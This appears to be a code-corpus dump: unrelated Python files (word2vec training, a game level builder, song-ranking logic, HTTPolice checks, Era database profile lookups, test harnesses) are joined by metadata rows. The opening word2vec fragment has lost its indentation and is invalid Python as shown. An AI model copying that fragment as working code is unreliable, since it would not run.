for line in f:
line = line.strip().split(' ')
syn_set = add2dict(line[0], line[1], syn_set, word2ix)
with open(PPDB_ANT_FILE) as f:
for line in f:
line = line.strip().split(' ')
ant_set = add2dict(line[0], line[1], ant_set, word2ix)
with open(WORDNET_ANT_FILE) as f:
for line in f:
line = line.strip().split(' ')
ant_set = add2dict(line[0], line[1], ant_set, word2ix)
# Convert the sets to lists
syn_set = {w: list(syn_set[w]) for w in syn_set}
ant_set = {w: list(ant_set[w]) for w in ant_set}
def generate_data(data, word2ix, window_size):
"""
Takes in a sequence of words, and returns the indexed data, a list of (word, [2 * window])
:param data: sequence of words
:param word2ix: dictionary mapping words to indexes
:param window_size: Lenght of window
:return indexed_data: List of (word_ix, [2 * window])
"""
indexed_data = []
for ix in xrange(window_size, len(data) - window_size):
word_ix = word2ix[data[ix]]
window = [word2ix[w] for w in data[ix - window_size: ix]] + [word2ix[w] for w in data[ix + 1: ix + window_size + 1]]
indexed_data.append((word_ix, window))
return indexed_data
class DataIterator(ut.Dataset):
def __init__(self, unigram_table, indexed_data, neg_samples, syn_set, ant_set, n_syn, n_ant):
self.indexed_data = indexed_data
self.unigram_table = unigram_table.astype(int)
self.neg_samples = neg_samples
self.syn_set = syn_set
self.ant_set = ant_set
self.n_syn = n_syn
self.n_ant = n_ant
def __len__(self):
return len(self.indexed_data)
def __getitem__(self, idx):
w_ix, p_ix = self.indexed_data[idx]
n_ix = np.random.choice(self.unigram_table, replace=True, size=self.neg_samples)
if w_ix in self.syn_set:
syn_ix = np.random.choice(self.syn_set[w_ix], replace=True, size=self.n_syn)
ms_ix = 1
else:
syn_ix = [0 for _ in xrange(self.n_syn)] # 0 is a padding token
ms_ix = 0
if w_ix in self.ant_set:
ant_ix = np.random.choice(self.ant_set[w_ix], replace=True, size=self.n_ant)
ma_ix = 1
else:
ant_ix = [0 for _ in xrange(self.n_ant)]
ma_ix = 0
# Handle synonyms
w_ix = torch.LongTensor([w_ix])
n_ix = torch.LongTensor(n_ix)
p_ix = torch.LongTensor(p_ix)
syn_ix = torch.LongTensor(syn_ix)
ms_ix = torch.FloatTensor([ms_ix])
ant_ix = torch.LongTensor(ant_ix)
ma_ix = torch.FloatTensor([ma_ix])
return w_ix, p_ix, n_ix, syn_ix, ms_ix, ant_ix, ma_ix
window = 4
neg_samples = 25
n_syn = 4
n_ant = 4
indexed_data = generate_data(data, word2ix, window)
iterator = DataIterator(unigram_table, indexed_data, neg_samples, syn_set, ant_set, n_syn, n_ant)
BATCH_SIZE = 128
dataloader = ut.DataLoader(iterator, batch_size=BATCH_SIZE,
shuffle=True, num_workers=0)
N_EPOCHS = 5
# lr = 0.001
lr = 0.025
bar = Progbar(N_EPOCHS)
w2v = Word2vec(len(word2ix), 300, sparse=False)
optimizer = optim.Adagrad(w2v.parameters(), lr=lr)
words_processed = 0.
for epoch in xrange(N_EPOCHS):
n_batches = len(iterator) // BATCH_SIZE if len(iterator) % BATCH_SIZE == 0 else (len(iterator) // BATCH_SIZE) + 1
bar = Progbar(n_batches)
print "\nEpoch (%d/ %d)\n" % (epoch + 1, N_EPOCHS)
for ix, batch in enumerate(dataloader):
batch = map(lambda x: Variable(x), batch)
if use_cuda:
batch = map(lambda x: x.cuda(), batch)
loss, p_score, n_score, s_score, a_score = w2v(*batch)
loss.backward()
optimizer.step()
optimizer.zero_grad()
# Update the lr
words_processed += BATCH_SIZE
new_lr = lr * max(1e-4, 1. - (words_processed / (len(iterator) * N_EPOCHS)))
for param_groups in optimizer.param_groups:
param_groups['lr'] = new_lr
loss, p_score, n_score, s_score, a_score = map(lambda x: getdata(x).numpy()[0], [loss, p_score, n_score, s_score, a_score])
bar.update(ix + 1, values=[('l', loss), ('p', p_score), ('n', n_score), ('s', s_score), ('a', a_score), ('lr', new_lr)])
weights = w2v.embedding_i.weight
weights = weights.cpu() if use_cuda else weights
weights = weights.data.numpy()
save_file = BASE_DIR + "Models/vocab_matrix_with_syn_ant.npy"
np.save(save_file, weights)
| 1,657 | 10 | 126 |
25203173320d6e81dd19ebeb6706912118a5fe19 | 1,278 | py | Python | utils/scripts/OOOlevelGen/src/levels/Watch_Out.py | fullscreennl/monkeyswipe | c56192e202674dd5ab18023f6cf14cf51e95fbd0 | [
"MIT"
] | null | null | null | utils/scripts/OOOlevelGen/src/levels/Watch_Out.py | fullscreennl/monkeyswipe | c56192e202674dd5ab18023f6cf14cf51e95fbd0 | [
"MIT"
] | null | null | null | utils/scripts/OOOlevelGen/src/levels/Watch_Out.py | fullscreennl/monkeyswipe | c56192e202674dd5ab18023f6cf14cf51e95fbd0 | [
"MIT"
] | null | null | null | import LevelBuilder
from sprites import * | 91.285714 | 149 | 0.726917 | import LevelBuilder
from sprites import *
def render(name,bg):
lb = LevelBuilder.LevelBuilder(name+".plist",background=bg)
lb.addObject(Beam.BeamSprite(x=147, y=261,width=306,height=14,angle='-4',restitution=0.2,static='true',friction=0.5,density=20 ).setName('Beam'))
lb.addObject(Enemy.EnemySprite(x=23, y=297,width=32,height=32,angle='0',restitution=0.2,static='false',friction=0.5,density=20 ))
lb.addObject(Beam.BeamSprite(x=238, y=165,width=201,height=14,angle='56',restitution=0.2,static='true',friction=0.5,density=20 ).setName('Beam'))
lb.addObject(Beam.BeamSprite(x=285, y=125,width=342,height=14,angle='56',restitution=0.2,static='true',friction=0.5,density=20 ).setName('Beam'))
lb.addObject(Beam.BeamSprite(x=451, y=260,width=154,height=14,angle='-4',restitution=0.2,static='true',friction=0.5,density=20 ).setName('Beam'))
lb.addObject(Enemy.EnemySprite(x=315, y=227,width=32,height=32,angle='0',restitution=0.2,static='false',friction=0.5,density=20 ))
lb.addObject(Enemy.EnemySprite(x=273, y=278,width=32,height=32,angle='0',restitution=0.2,static='false',friction=0.5,density=20 ))
lb.addObject(Star.StarSprite(x=447, y=291,width=32,height=32))
lb.addObject(Hero.HeroSprite(x=23, y=24,width=32,height=32))
lb.render() | 1,215 | 0 | 22 |
647b67367c0e63e28881482b5c1f510ab1372ef4 | 6,264 | py | Python | core/predictor.py | huynhnhathao/hum_to_find | a0d7ec4bab1a7e2f7175956ff2721e23e2448840 | [
"MIT"
] | 1 | 2021-12-22T07:30:18.000Z | 2021-12-22T07:30:18.000Z | core/predictor.py | huynhnhathao/hum_to_find | a0d7ec4bab1a7e2f7175956ff2721e23e2448840 | [
"MIT"
] | null | null | null | core/predictor.py | huynhnhathao/hum_to_find | a0d7ec4bab1a7e2f7175956ff2721e23e2448840 | [
"MIT"
] | 1 | 2022-01-28T02:36:17.000Z | 2022-01-28T02:36:17.000Z | from typing import Dict, List
import pickle
import numpy as np
def predict_song(neighbors: Dict[str, List[int]]) -> Dict[str, List[int]]:
"""predict the ranks of song ids for each hum given its retrieved song neighbors
The most importance job is choose the first place song
The rules are, given one hum query and its retrieved neighbors:
1. if in top 10, there is no song id that appear 2 times then the rank
follow the distance rank
2. if in top 10, there is a song that appear >= 3 times, it must be ranked first place
3. if in top 10, there are song ids that appear 2 times and their ranks < 5, it will be ranked first
4. if in top 10, there are more than one song id that appear >= 2 times,
choose the one that has rank sum smaller to be top 1, then the second rank is the next
the other positions will follow the distance rank given that it is not already in the ranked list.
"""
# first we only choose the first rank song
# assume song_ids are all ints
ranked_ = {}
for qname, nbs in neighbors.items():
chosen = []
# if one song appear more than 3 times in top 5, it must be the one
# if the nearest song is not ranked first by this rule, it must be ranked second
ids, counts = np.unique(nbs[:5], return_counts = True)
max_count = np.max(counts)
if max_count >=3:
idx = list(counts).index(max_count)
chosen.append(ids[idx])
if nbs[0] != chosen[0]:
chosen.append(nbs[0])
ranked_[qname] = chosen
continue
# if in top 5 there are *2* song_ids that both appear 2 times, then the one
# that on top 1 and appear 2 times will be the first, the one on top 2
# or larger and appear 2 times will be the second
ids, counts = np.unique(nbs[:5], return_counts = True)
max_count = np.max(counts)
if len(ids) == 3 and max_count == 2:
nearest_song = nbs[0]
idx_of_nearest_song = list(ids).index(nearest_song)
count_of_nearest_song = counts[idx_of_nearest_song]
if count_of_nearest_song == 2:
chosen.append(nearest_song)
for i, c in enumerate(counts):
if c == 2 and ids[i] not in chosen:
chosen.append(ids[i])
ranked_[qname] = chosen
continue
# if in top 5, there is *one* song_id that appear 2 times and one of that is
# top 1, then it must be the one
# if that song_id appear 2 times but not the nearest, then it still ranked
# top 1 but the second ranked is the nearest
ids, counts = np.unique(nbs[:5], return_counts = True)
if len(ids) == 4:
nearest_song_id = nbs[0]
idx_of_nearest_song = list(ids).index(nearest_song_id)
if counts[idx_of_nearest_song] == 2:
chosen.append(nearest_song_id)
ranked_[qname] = chosen
continue
elif counts[idx_of_nearest_song] == 1:
idx = list(counts).index(2)
song_id = ids[idx]
chosen.append(song_id)
chosen.append(nearest_song_id)
# if top 10 are 10 different songs, the just take those
ids, counts = np.unique(nbs[:10], return_counts = True)
if len(ids) == 10:
chosen = nbs[:10]
ranked_[qname] = list(chosen)
continue
# if in top 5, there are 5 different song ids, and there is one or more
# song_ids that also appear on top 10 and on top 5, then it will be the
# first rank, the second rank is the one that nearest(if the previous is
# not the nearest)
ids, counts = np.unique(nbs[:5], return_counts = True)
if len(ids) == 5: # also means max_count == 1
new_ids, new_counts = np.unique(nbs[5:10], return_counts = True)
for id in nbs[:5]:
if int(id) in new_ids:
chosen.append(id)
if len(chosen) == 0:
chosen = list(nbs[:10])
ranked_[qname] = chosen
continue
if chosen[0] != nbs[0]:
chosen.append(nbs[0])
ranked_[qname] = chosen
continue
if len(chosen) == 0:
ranked_[qname] = list(nbs[:10])
# now add the remaining neighbors to the rank list, follow the distance rank
for qname, ranks in ranked_.items():
if len(ranks) == 0:
print('ranks=0')
j = 0
while len(ranks) < 10 and j < len(neighbors[qname]):
if neighbors[qname][j] not in ranks:
ranks.append(neighbors[qname][j])
j+=1
while len(ranks) < 10:
ranks.append(0)
absences = set(neighbors.keys()) - set(ranked_.keys())
for qname in absences:
chosen = []
j = 0
while len(chosen) < 10 and j < len(neighbors[qname]):
if neighbors[qname][j] not in chosen:
chosen.append(neighbors[qname][j])
j +=1
while len(chosen) < 10:
chosen.append(0)
ranked_[qname] = chosen
return ranked_
if __name__ == '__main__':
neighbors = pickle.load(open(r'C:\Users\ASUS\Desktop\repositories\hum_to_find\neighbors.pkl', 'rb'))
val_data = pickle.load(open(r'C:\Users\ASUS\Desktop\repositories\hum_to_find\crepe_freq\val_data.pkl', 'rb'))
print(len(neighbors))
for qname, nbs in neighbors.items():
neighbors[qname] = [int(x) for x in neighbors[qname]]
rs = predict_song(neighbors)
print(len(rs))
mrr = []
for key in rs.keys():
for tup in val_data:
if key == tup[2]:
if int(tup[0]) not in list(rs[key]):
mrr.append(0)
else:
idx = list(rs[key]).index(int(tup[0])) +1
mrr.append(1/idx)
print(np.mean(mrr)) | 39.898089 | 114 | 0.552203 | from typing import Dict, List
import pickle
import numpy as np
def predict_song(neighbors: Dict[str, List[int]]) -> Dict[str, List[int]]:
"""predict the ranks of song ids for each hum given its retrieved song neighbors
The most importance job is choose the first place song
The rules are, given one hum query and its retrieved neighbors:
1. if in top 10, there is no song id that appear 2 times then the rank
follow the distance rank
2. if in top 10, there is a song that appear >= 3 times, it must be ranked first place
3. if in top 10, there are song ids that appear 2 times and their ranks < 5, it will be ranked first
4. if in top 10, there are more than one song id that appear >= 2 times,
choose the one that has rank sum smaller to be top 1, then the second rank is the next
the other positions will follow the distance rank given that it is not already in the ranked list.
"""
# first we only choose the first rank song
# assume song_ids are all ints
ranked_ = {}
for qname, nbs in neighbors.items():
chosen = []
# if one song appear more than 3 times in top 5, it must be the one
# if the nearest song is not ranked first by this rule, it must be ranked second
ids, counts = np.unique(nbs[:5], return_counts = True)
max_count = np.max(counts)
if max_count >=3:
idx = list(counts).index(max_count)
chosen.append(ids[idx])
if nbs[0] != chosen[0]:
chosen.append(nbs[0])
ranked_[qname] = chosen
continue
# if in top 5 there are *2* song_ids that both appear 2 times, then the one
# that on top 1 and appear 2 times will be the first, the one on top 2
# or larger and appear 2 times will be the second
ids, counts = np.unique(nbs[:5], return_counts = True)
max_count = np.max(counts)
if len(ids) == 3 and max_count == 2:
nearest_song = nbs[0]
idx_of_nearest_song = list(ids).index(nearest_song)
count_of_nearest_song = counts[idx_of_nearest_song]
if count_of_nearest_song == 2:
chosen.append(nearest_song)
for i, c in enumerate(counts):
if c == 2 and ids[i] not in chosen:
chosen.append(ids[i])
ranked_[qname] = chosen
continue
# if in top 5, there is *one* song_id that appear 2 times and one of that is
# top 1, then it must be the one
# if that song_id appear 2 times but not the nearest, then it still ranked
# top 1 but the second ranked is the nearest
ids, counts = np.unique(nbs[:5], return_counts = True)
if len(ids) == 4:
nearest_song_id = nbs[0]
idx_of_nearest_song = list(ids).index(nearest_song_id)
if counts[idx_of_nearest_song] == 2:
chosen.append(nearest_song_id)
ranked_[qname] = chosen
continue
elif counts[idx_of_nearest_song] == 1:
idx = list(counts).index(2)
song_id = ids[idx]
chosen.append(song_id)
chosen.append(nearest_song_id)
# if top 10 are 10 different songs, the just take those
ids, counts = np.unique(nbs[:10], return_counts = True)
if len(ids) == 10:
chosen = nbs[:10]
ranked_[qname] = list(chosen)
continue
# if in top 5, there are 5 different song ids, and there is one or more
# song_ids that also appear on top 10 and on top 5, then it will be the
# first rank, the second rank is the one that nearest(if the previous is
# not the nearest)
ids, counts = np.unique(nbs[:5], return_counts = True)
if len(ids) == 5: # also means max_count == 1
new_ids, new_counts = np.unique(nbs[5:10], return_counts = True)
for id in nbs[:5]:
if int(id) in new_ids:
chosen.append(id)
if len(chosen) == 0:
chosen = list(nbs[:10])
ranked_[qname] = chosen
continue
if chosen[0] != nbs[0]:
chosen.append(nbs[0])
ranked_[qname] = chosen
continue
if len(chosen) == 0:
ranked_[qname] = list(nbs[:10])
# now add the remaining neighbors to the rank list, follow the distance rank
for qname, ranks in ranked_.items():
if len(ranks) == 0:
print('ranks=0')
j = 0
while len(ranks) < 10 and j < len(neighbors[qname]):
if neighbors[qname][j] not in ranks:
ranks.append(neighbors[qname][j])
j+=1
while len(ranks) < 10:
ranks.append(0)
absences = set(neighbors.keys()) - set(ranked_.keys())
for qname in absences:
chosen = []
j = 0
while len(chosen) < 10 and j < len(neighbors[qname]):
if neighbors[qname][j] not in chosen:
chosen.append(neighbors[qname][j])
j +=1
while len(chosen) < 10:
chosen.append(0)
ranked_[qname] = chosen
return ranked_
if __name__ == '__main__':
neighbors = pickle.load(open(r'C:\Users\ASUS\Desktop\repositories\hum_to_find\neighbors.pkl', 'rb'))
val_data = pickle.load(open(r'C:\Users\ASUS\Desktop\repositories\hum_to_find\crepe_freq\val_data.pkl', 'rb'))
print(len(neighbors))
for qname, nbs in neighbors.items():
neighbors[qname] = [int(x) for x in neighbors[qname]]
rs = predict_song(neighbors)
print(len(rs))
mrr = []
for key in rs.keys():
for tup in val_data:
if key == tup[2]:
if int(tup[0]) not in list(rs[key]):
mrr.append(0)
else:
idx = list(rs[key]).index(int(tup[0])) +1
mrr.append(1/idx)
print(np.mean(mrr)) | 0 | 0 | 0 |
06eed4751ad15e78692e64926dfd2741664949ce | 583 | py | Python | utils/model_utils.py | jayleicn/moment_detr | a5d0fa0f0b9ab005cf277327da0cb81ac1455194 | [
"MIT"
] | 90 | 2021-07-20T19:44:36.000Z | 2022-03-30T06:53:07.000Z | utils/model_utils.py | synchrony10/moment_detr | e93f63ff64d702a446a59350e0cd7bdcc417361c | [
"MIT"
] | 12 | 2021-08-03T03:14:00.000Z | 2022-03-24T13:03:27.000Z | utils/model_utils.py | synchrony10/moment_detr | e93f63ff64d702a446a59350e0cd7bdcc417361c | [
"MIT"
] | 15 | 2021-07-21T06:13:58.000Z | 2022-03-13T02:10:27.000Z | def count_parameters(model, verbose=True):
"""Count number of parameters in PyTorch model,
References: https://discuss.pytorch.org/t/how-do-i-check-the-number-of-parameters-of-a-model/4325/7.
from utils.utils import count_parameters
count_parameters(model)
import sys
sys.exit(1)
"""
n_all = sum(p.numel() for p in model.parameters())
n_trainable = sum(p.numel() for p in model.parameters() if p.requires_grad)
if verbose:
print("Parameter Count: all {:,d}; trainable {:,d}".format(n_all, n_trainable))
return n_all, n_trainable
| 36.4375 | 104 | 0.689537 | def count_parameters(model, verbose=True):
"""Count number of parameters in PyTorch model,
References: https://discuss.pytorch.org/t/how-do-i-check-the-number-of-parameters-of-a-model/4325/7.
from utils.utils import count_parameters
count_parameters(model)
import sys
sys.exit(1)
"""
n_all = sum(p.numel() for p in model.parameters())
n_trainable = sum(p.numel() for p in model.parameters() if p.requires_grad)
if verbose:
print("Parameter Count: all {:,d}; trainable {:,d}".format(n_all, n_trainable))
return n_all, n_trainable
| 0 | 0 | 0 |
923c97b76b64e523bffcff87a6d47e5eb6f80a73 | 2,247 | py | Python | httpolice/exchange.py | bmwiedemann/httpolice | 4da2bde3d14a24b0623ee45ae10afd192d6fa771 | [
"MIT"
] | 1 | 2019-04-10T12:46:13.000Z | 2019-04-10T12:46:13.000Z | httpolice/exchange.py | bmwiedemann/httpolice | 4da2bde3d14a24b0623ee45ae10afd192d6fa771 | [
"MIT"
] | null | null | null | httpolice/exchange.py | bmwiedemann/httpolice | 4da2bde3d14a24b0623ee45ae10afd192d6fa771 | [
"MIT"
] | null | null | null | # -*- coding: utf-8; -*-
from httpolice import request, response
from httpolice.blackboard import Blackboard
from httpolice.known import st
def complaint_box(*args, **kwargs):
"""Create an empty exchange that only carries a single notice.
This is used (for example, in :mod:`httpolice.framing1`)
to report notices that do not correspond to any particular message.
"""
box = Exchange(None, [])
box.complain(*args, **kwargs)
return box
def check_exchange(exch):
"""Run all checks on the exchange `exch`, modifying it in place."""
expect_100 = False
if exch.request:
request.check_request(exch.request)
expect_100 = exch.request.headers.expect == u'100-continue'
response.check_responses(exch.responses)
for resp in exch.responses:
if resp.status == st.continue_:
expect_100 = False
if expect_100 and resp.status == st.switching_protocols:
resp.complain(1305)
| 30.364865 | 77 | 0.621273 | # -*- coding: utf-8; -*-
from httpolice import request, response
from httpolice.blackboard import Blackboard
from httpolice.known import st
class Exchange(Blackboard):
# Note that an exchange is a :class:`Blackboard`,
# so notices can be reported directly on it.
# See :func:`complaint_box`.
self_name = u'exch'
def __repr__(self):
return 'Exchange(%r, %r)' % (self.request, self.responses)
def __init__(self, req, resps):
"""
:param req:
The request, as a :class:`~httpolice.Request` object.
If it is not available, you can pass `None`,
and the responses will be checked on their own.
However, this **disables many checks**
which rely on context information from the request.
:param resps:
The responses to `req`,
as a list of :class:`~httpolice.Response` objects.
Usually this will be a list of 1 element.
If you only want to check the request, pass an empty list ``[]``.
"""
super(Exchange, self).__init__()
for resp in resps:
resp.request = req
self.request = req
self.responses = resps
@property
def children(self):
r = super(Exchange, self).children
if self.request is not None:
r.append(self.request)
r.extend(self.responses)
return r
def complaint_box(*args, **kwargs):
"""Create an empty exchange that only carries a single notice.
This is used (for example, in :mod:`httpolice.framing1`)
to report notices that do not correspond to any particular message.
"""
box = Exchange(None, [])
box.complain(*args, **kwargs)
return box
def check_exchange(exch):
"""Run all checks on the exchange `exch`, modifying it in place."""
expect_100 = False
if exch.request:
request.check_request(exch.request)
expect_100 = exch.request.headers.expect == u'100-continue'
response.check_responses(exch.responses)
for resp in exch.responses:
if resp.status == st.continue_:
expect_100 = False
if expect_100 and resp.status == st.switching_protocols:
resp.complain(1305)
| 228 | 1,025 | 23 |
331c20c552c40b6bdb2cf47c04c503e2ded9cf8f | 2,024 | py | Python | python/haarClassifiers/trainHaarCascade.py | NunoDuarte/openCVdevelop | 43204a903a3c96758332a86c7d6b10c285d6ed37 | [
"MIT"
] | null | null | null | python/haarClassifiers/trainHaarCascade.py | NunoDuarte/openCVdevelop | 43204a903a3c96758332a86c7d6b10c285d6ed37 | [
"MIT"
] | null | null | null | python/haarClassifiers/trainHaarCascade.py | NunoDuarte/openCVdevelop | 43204a903a3c96758332a86c7d6b10c285d6ed37 | [
"MIT"
] | null | null | null | import urllib
import cv2
import numpy as np
import os
create_pos_n_neg() | 33.180328 | 99 | 0.528656 | import urllib
import cv2
import numpy as np
import os
def store_raw_images():
neg_images_link = 'http://image-net.org/api/text/imagenet.synset.geturls?wnid=n07942152'
#neg_images_link = 'http://image-net.org/api/text/imagenet.synset.geturls?wnid=n00523513'
neg_images_urls = urllib.urlopen(neg_images_link).read().decode()
if not os.path.exists('neg'):
os.makedirs('neg')
pic_num = 919
for i in neg_images_urls.split('\n'):
try:
print(i)
urllib.urlretrieve(i, "neg/" + str(pic_num)+'.jpg')
img = cv2.imread("neg/" + str(pic_num)+'.jpg', cv2.IMREAD_GRAYSCALE)
resize_image = cv2.resize(img, (100, 100))
cv2.imwrite("neg/" + str(pic_num)+'.jpg', resize_image)
pic_num += 1
except Exception as e:
print(str(e))
def find_uglies():
for file_type in ['neg']:
for img in os.listdir(file_type):
for ugly in os.listdir('uglies'):
try:
current_image_path = str(file_type)+'/'+str(img)
ugly = cv2.imread('uglies/'+str(ugly))
question = cv2.imread(current_image_path)
if ugly.shape == question.shape and not (np.bitwise_xor(ugly, question).any()):
print('You ugly!')
print(current_image_path)
os.remove(current_image_path)
except Exception as e:
print(str(e))
def create_pos_n_neg():
for file_type in ['neg']:
for img in os.listdir(file_type):
if file_type == 'neg':
line = file_type + '/' + img + '\n'
with open('bg.txt', 'a') as f:
f.write(line)
# we are not using this!
elif file_type == 'pos':
line = file_type + '/' + img + '1 0 0 50 50\n'
with open('info.dat', 'a') as f:
f.write(line)
create_pos_n_neg() | 1,881 | 0 | 69 |
40d75528c0577bc7d64f4d85d7514f0c5d3b052f | 1,819 | py | Python | play/EraPostgresProvision/scripts/Substrate_Era_PostgreSQL_DB_Action___pre_create___Task__2GetProfileIDs.py | halsayed/calm | 46c93ac2b02227663f0184d149f62d142b2638cc | [
"MIT"
] | null | null | null | play/EraPostgresProvision/scripts/Substrate_Era_PostgreSQL_DB_Action___pre_create___Task__2GetProfileIDs.py | halsayed/calm | 46c93ac2b02227663f0184d149f62d142b2638cc | [
"MIT"
] | null | null | null | play/EraPostgresProvision/scripts/Substrate_Era_PostgreSQL_DB_Action___pre_create___Task__2GetProfileIDs.py | halsayed/calm | 46c93ac2b02227663f0184d149f62d142b2638cc | [
"MIT"
] | 1 | 2021-11-16T10:28:42.000Z | 2021-11-16T10:28:42.000Z | # Set creds and headers
era_user = '@@{era_creds.username}@@'
era_pass = '@@{era_creds.secret}@@'
headers = {'Content-Type': 'application/json', 'Accept': 'application/json'}
# Get Software Profile ID
url = "https://@@{era_ip}@@:8443/era/v0.8/profiles?type=Software&name=@@{software_profile}@@"
resp = urlreq(url, verb='GET', auth='BASIC', user=era_user, passwd=era_pass, headers=headers)
if resp.ok:
print "SOFTWARE_PROF_ID={0}".format(json.loads(resp.content)['id'])
else:
print "Get Software Profile ID request failed", json.dumps(json.loads(resp.content), indent=4)
exit(1)
# Get Compute Profile ID
url = "https://@@{era_ip}@@:8443/era/v0.8/profiles?type=Compute&name=@@{compute_profile}@@"
resp = urlreq(url, verb='GET', auth='BASIC', user=era_user, passwd=era_pass, headers=headers)
if resp.ok:
print "COMPUTE_PROF_ID={0}".format(json.loads(resp.content)['id'])
else:
print "Get Compute Profile ID request failed", json.dumps(json.loads(resp.content), indent=4)
exit(1)
# Get Network Profile ID
url = "https://@@{era_ip}@@:8443/era/v0.8/profiles?type=Network&name=@@{network_profile}@@"
resp = urlreq(url, verb='GET', auth='BASIC', user=era_user, passwd=era_pass, headers=headers)
if resp.ok:
print "NETWORK_PROF_ID={0}".format(json.loads(resp.content)['id'])
else:
print "Get Network Profile ID request failed", json.dumps(json.loads(resp.content), indent=4)
exit(1)
# Get DB Parameter ID
url = "https://@@{era_ip}@@:8443/era/v0.8/profiles?type=Database_Parameter&name=@@{database_parameter}@@"
resp = urlreq(url, verb='GET', auth='BASIC', user=era_user, passwd=era_pass, headers=headers)
if resp.ok:
print "DB_PARAM_ID={0}".format(json.loads(resp.content)['id'])
else:
print "Get DB Parameter ID request failed", json.dumps(json.loads(resp.content), indent=4)
exit(1) | 45.475 | 109 | 0.706432 | # Set creds and headers
era_user = '@@{era_creds.username}@@'
era_pass = '@@{era_creds.secret}@@'
headers = {'Content-Type': 'application/json', 'Accept': 'application/json'}
# Get Software Profile ID
url = "https://@@{era_ip}@@:8443/era/v0.8/profiles?type=Software&name=@@{software_profile}@@"
resp = urlreq(url, verb='GET', auth='BASIC', user=era_user, passwd=era_pass, headers=headers)
if resp.ok:
print "SOFTWARE_PROF_ID={0}".format(json.loads(resp.content)['id'])
else:
print "Get Software Profile ID request failed", json.dumps(json.loads(resp.content), indent=4)
exit(1)
# Get Compute Profile ID
url = "https://@@{era_ip}@@:8443/era/v0.8/profiles?type=Compute&name=@@{compute_profile}@@"
resp = urlreq(url, verb='GET', auth='BASIC', user=era_user, passwd=era_pass, headers=headers)
if resp.ok:
print "COMPUTE_PROF_ID={0}".format(json.loads(resp.content)['id'])
else:
print "Get Compute Profile ID request failed", json.dumps(json.loads(resp.content), indent=4)
exit(1)
# Get Network Profile ID
url = "https://@@{era_ip}@@:8443/era/v0.8/profiles?type=Network&name=@@{network_profile}@@"
resp = urlreq(url, verb='GET', auth='BASIC', user=era_user, passwd=era_pass, headers=headers)
if resp.ok:
print "NETWORK_PROF_ID={0}".format(json.loads(resp.content)['id'])
else:
print "Get Network Profile ID request failed", json.dumps(json.loads(resp.content), indent=4)
exit(1)
# Get DB Parameter ID
url = "https://@@{era_ip}@@:8443/era/v0.8/profiles?type=Database_Parameter&name=@@{database_parameter}@@"
resp = urlreq(url, verb='GET', auth='BASIC', user=era_user, passwd=era_pass, headers=headers)
if resp.ok:
print "DB_PARAM_ID={0}".format(json.loads(resp.content)['id'])
else:
print "Get DB Parameter ID request failed", json.dumps(json.loads(resp.content), indent=4)
exit(1) | 0 | 0 | 0 |
effc868ba3985263b54f27c9ba1dafa032b3a960 | 351 | py | Python | services/shortto.py | joshthecoder/shorty-python | 35687d010683944d75e3f0dce7799903296172c5 | [
"MIT"
] | 11 | 2015-05-29T04:58:28.000Z | 2020-05-31T17:07:52.000Z | services/shortto.py | joshthecoder/shorty-python | 35687d010683944d75e3f0dce7799903296172c5 | [
"MIT"
] | null | null | null | services/shortto.py | joshthecoder/shorty-python | 35687d010683944d75e3f0dce7799903296172c5 | [
"MIT"
] | 2 | 2015-03-10T06:22:31.000Z | 2018-06-18T18:20:59.000Z | ## Shorty
## Copyright 2009 Joshua Roesslein
## See LICENSE
## @url short.to
| 21.9375 | 65 | 0.60114 | ## Shorty
## Copyright 2009 Joshua Roesslein
## See LICENSE
## @url short.to
class Shortto(Service):
def shrink(self, bigurl):
resp = request('http://short.to/s.txt', {'url': bigurl})
return resp.read()
def expand(self, tinyurl):
resp = request('http://long.to/do.txt', {'url': tinyurl})
return resp.read()
| 194 | 2 | 76 |
d545d30c9fd67772bfbdc34fdd46ac0419574c8a | 19,748 | py | Python | ws/test_web_services.py | OpenTreeOfLife/otcetera | 2b5ff724094f768df9bc37b9f0ffb319abd03a20 | [
"BSD-2-Clause",
"MIT"
] | 4 | 2015-04-29T09:23:12.000Z | 2020-11-30T07:43:07.000Z | ws/test_web_services.py | OpenTreeOfLife/otcetera | 2b5ff724094f768df9bc37b9f0ffb319abd03a20 | [
"BSD-2-Clause",
"MIT"
] | 70 | 2015-03-19T08:19:40.000Z | 2022-03-21T19:06:18.000Z | ws/test_web_services.py | OpenTreeOfLife/otcetera | 2b5ff724094f768df9bc37b9f0ffb319abd03a20 | [
"BSD-2-Clause",
"MIT"
] | 3 | 2015-07-03T19:21:20.000Z | 2015-12-02T13:24:53.000Z | #!/usr/bin/env python
import subprocess
import requests
import json
import time
import logging
try:
from Queue import Queue
except:
from queue import Queue
from threading import Thread, RLock
_LOG = logging.getLogger(__name__)
_LOG.setLevel(logging.DEBUG)
_lh = logging.StreamHandler()
_lh.setFormatter(logging.Formatter("[%(asctime)s] %(filename)s (%(lineno)3d): %(levelname) 8s: %(message)s"))
_LOG.addHandler(_lh)
NUM_TESTS = 0
FAILED_TESTS = []
FRAC_FLOAT_DIFF_TOL = 0.001
#########################################################################################
# The following code for execution in a non-blocking thread is from pyraphyletic. If
# we moved it to peyotl, we could import it from there (at the cost of making)
# otcetera depend on peyot.
class JobQueue(Queue):
"""Thread-safe Queue that logs the addition of a job to debug"""
def put(self, item, block=None, timeout=None):
"""Logs `item` at the debug level then calls base-class put"""
_LOG.debug("%s queued" % str(item))
Queue.put(self, item, block=block, timeout=timeout)
_jobq = JobQueue()
def worker():
"""Infinite loop of getting jobs off of _jobq and performing them."""
while True:
job = _jobq.get()
_LOG.debug('"{}" started"'.format(job))
try:
job.start()
except:
_LOG.exception("Worker dying.")
else:
try:
job.get_results()
except:
_LOG.exception("Worker exception. Error in job.get_results")
_LOG.debug('"{}" completed'.format(job))
_jobq.task_done()
_WORKER_THREADS = []
def start_worker(num_workers):
"""Spawns worker threads such that at least `num_workers` threads will be
launched for processing jobs in the jobq.
The only way that you can get more than `num_workers` threads is if you
have previously called the function with a number > `num_workers`.
(worker threads are never killed).
"""
assert num_workers > 0, "A positive number must be passed as the number of worker threads"
num_currently_running = len(_WORKER_THREADS)
for i in range(num_currently_running, num_workers):
_LOG.debug("Launching Worker thread #%d" % i)
t = Thread(target=worker)
_WORKER_THREADS.append(t)
t.setDaemon(True)
t.start()
#########################################################################################
_verb_name_to_req_method = {"GET": requests.get,
"PUT": requests.put,
"POST": requests.post,
"DELETE": requests.delete,
"HEAD": requests.head,
"OPTIONS": requests.options,
}
API_HEADERS = {'content-type' : 'application/json',
'accept' : 'application/json',
}
#########################################################################################
PIDFILE_NAME = "pidfile.txt"
RUNNING_SERVER = None
SERVER_PORT = 1985 # global, set by CLI. Needed by server launch and threads
